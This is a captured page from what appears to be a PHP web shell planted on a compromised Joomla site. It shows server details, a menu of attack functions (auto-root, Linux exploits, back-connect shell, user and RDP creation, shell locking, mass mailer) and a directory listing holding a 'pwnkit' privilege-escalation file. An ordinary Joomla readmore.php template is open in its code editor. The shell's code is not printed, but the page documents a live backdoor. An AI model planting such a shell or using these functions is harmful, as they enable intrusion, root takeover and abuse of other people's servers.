Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
layouts /
joomla /
content /
[ HOME SHELL ]
Name
Size
Permission
Action
icons
[ DIR ]
drwxr-xr-x
info_block
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
associations.php
648
B
-rw----r--
blog_style_default_item_title....
1.76
KB
-rw----r--
categories_default.php
1.22
KB
-rw----r--
categories_default_items.php
683
B
-rw----r--
category_default.php
3.8
KB
-rw----r--
emptystate.php
2.31
KB
-rw----r--
emptystate_module.php
1.12
KB
-rw----r--
full_image.php
1.55
KB
-rw----r--
icons.php
600
B
-rw----r--
info_block.php
2.18
KB
-rw----r--
intro_image.php
2.19
KB
-rw----r--
language.php
763
B
-rw----r--
options_default.php
1.61
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
readmore.php
2.19
KB
-rw----r--
tags.php
1.12
KB
-rw----r--
text_filters.php
1.56
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readmore.php
<?php /** * @package Joomla.Site * @subpackage Layout * * @copyright (C) 2014 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; use Joomla\CMS\Factory; use Joomla\CMS\HTML\HTMLHelper; use Joomla\CMS\Language\Text; $params = $displayData['params']; $item = $displayData['item']; $direction = Factory::getLanguage()->isRtl() ? 'left' : 'right'; ?> <p class="readmore"> <?php if (!$params->get('access-view')) : ?> <a class="btn btn-secondary" href="<?php echo $displayData['link']; ?>" aria-label="<?php echo Text::_('JGLOBAL_REGISTER_TO_READ_MORE') . ' ' . $this->escape($item->title); ?>"> <?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?> <?php echo Text::_('JGLOBAL_REGISTER_TO_READ_MORE'); ?> </a> <?php elseif ($readmore = $item->alternative_readmore) : ?> <a class="btn btn-secondary" href="<?php echo $displayData['link']; ?>" aria-label="<?php echo $this->escape($readmore . ' ' . $item->title); ?>"> <?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?> <?php echo $readmore; ?> <?php if ($params->get('show_readmore_title', 0) != 0) : ?> <?php echo HTMLHelper::_('string.truncate', $item->title, $params->get('readmore_limit')); ?> <?php endif; ?> </a> <?php elseif ($params->get('show_readmore_title', 0) == 0) : ?> <a class="btn btn-secondary" href="<?php echo $displayData['link']; ?>" aria-label="<?php echo Text::sprintf('JGLOBAL_READ_MORE_TITLE', $this->escape($item->title)); ?>"> <?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?> <?php echo Text::_('JGLOBAL_READ_MORE'); ?> </a> <?php else : ?> <a class="btn btn-secondary" href="<?php echo $displayData['link']; ?>" aria-label="<?php echo Text::sprintf('JGLOBAL_READ_MORE_TITLE', $this->escape($item->title)); ?>"> <?php echo '<span class="icon-chevron-' . $direction . '" aria-hidden="true"></span>'; ?> <?php echo Text::sprintf('JGLOBAL_READ_MORE_TITLE', HTMLHelper::_('string.truncate', $item->title, $params->get('readmore_limit'))); ?> </a> <?php endif; ?> </p>
Close